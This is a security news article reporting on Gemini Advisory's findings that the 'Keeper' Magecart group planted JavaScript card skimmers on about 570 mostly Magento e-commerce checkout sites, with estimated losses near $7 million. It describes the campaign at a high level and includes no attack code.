Card Not Present Fraud , Fraud Management & Cybercrime

'Keeper' Group Targeted Payment Card Data on 570 Sites

Hackers Used Magecart-Style Web Skimmers Against Online E-Commerce Sites
'Keeper' Group Targeted Payment Card Data on 570 Sites
How the 'Keeper' hacking group works (Source: Gemini Advisory)

A hacking group known as "Keeper" has been using Magecart-like web skimmers to target the online checkout sites and portals of hundreds of e-commerce sites in order to steal customers' payment card data, according to a report from security firm Gemini Advisory.

See Also: Scams & Mule Defense: Real-Time Scam Prevention and Advanced Money Mule Detection

Since at least 2017, the Keeper group has targeted approximately 570 online checkout sites, primarily those using the Magento e-commerce platform, belonging to small and midsized e-commerce firms with estimated losses at about $7 million, according to Gemini.

The researchers note that the majority of the victimized e-commerce sites are located in the U.S., the U.K. and the Netherlands, although the hacking group is suspected of targeting sites in 55 additional countries. And while the majority of the e-commerce sites were small, some were actively generating 500,000 to 1 million visitors each month, the report states.

"The Keeper Magecart group has been active for three years, over which time it has continually improved its technical sophistication and the scale of its operations," the Gemini report notes. "Based on this pattern of successful Magecart attacks, Gemini assesses with high confidence that Keeper is likely to continue launching increasingly sophisticated attacks against online merchants across the world."

Poor Operational Security

The Gemini researchers uncovered the Keeper group's operations when they discovered an unsecured access log that was part of the control panel used to host the stolen payment card data, according to the report.

By examining the unsecured access log, the researchers discovered approximately 184,000 compromised payment card numbers and other data stolen sometime between July 2018 and April 2019. This allowed the researchers to estimate that the hacking group may have compromised some 700,000 payment cards over three years, which would have resulted in losses of up to $7 million.

"Extrapolating the number of cards per nine months to Keeper’s overall lifespan, and given the dark web median price of $10 per compromised Card Not Present card, this group has likely generated upwards of $7 million," the report notes.

Magento Under Attack

The majority of these attacks, about 85%, targeted sites using the Magento e-commerce content management system platform to support their online checkout portals, according to Gemini. Magento, which is owned by Adobe, is a popular platform that e-commerce companies use to build and host their online checkout pages. It's also a frequent target of Magecart-style attacks, the researchers note (see: JavaScript Skimmers Found Hidden in 'Favicon' Icons).

Magento ended support for two earlier versions of its platform - Magento Commerce 1, formerly known as Enterprise Edition, and Magento Open Source 1, formerly known as Community Edition - on June 30, but the Gemini report did not state whether these versions were involved in the attacks. Adobe is recommending users upgrade to the latest versions.

How Keeper Works

The Keeper hackers use malicious domains disguised as legitimate websites in order to host their JavaScript web skimming payloads, and then use these sites to exfiltrate the stolen payment card data, the researchers note. In many cases, the top-level domain name was changed slightly from the legitimate site in order to maintain the façade of being legitimate.

"For example, the attacker domain closetlondon[.]org attempted to imitate," according to the report.

The hacking group is also known to imitate popular website plugins and payment gateways to trick their victims, the researchers add. The researchers say they identified 64 malicious domains and 73 exfiltration domains that the Keeper operators managed as part of their attack infrastructure.

The Keeper group uses these domains to inject malicious JavaScript or web skimming code into an e-commerce firm's online checkout page in order to steal card data, billing information, and additional personally identifiable information, the researchers note. After successfully exfiltrating the data, the hackers then proceed to host the data on the same domain server that the JavaScript lives on.

Targeting E-Commerce

Magecart is the umbrella moniker for a group of cybercriminal gangs that have used JavaScript skimmers, also known as JavaScript sniffers or JS sniffers, on dozens of e-commerce checkout sites and portals over the last several years.

There are about 12 criminal groups that make up Magecart, some dating to 2014, according to security researchers.

One such attack in June saw jewellery and accessories retailer Claire's report that Magecart operators stole its customers' payment card data (see: Claire's: Magecart E-Commerce Hackers Stole Card Data).

Another aspect to Magecart came to light earlier this week when the Dutch security firm Sansec published a report tying the infrastructure used by some Magecart groups to North Korean hackers known as Lazarus or Hidden Cobra, which allegedly have ties to the government (see: North Korean Hacking Infrastructure Tied to Magecart Hits).

About the Author

Akshaya Asokan

Akshaya Asokan

Senior Correspondent, ISMG

Asokan is a U.K.-based senior correspondent for Information Security Media Group's global news desk. She previously worked with IDG and other publications, reporting on developments in technology, minority rights and education.

Around the Network

Our website uses cookies. Cookies enable us to provide the best experience possible and help us understand how visitors use our website. By browsing, you agree to our use of cookies.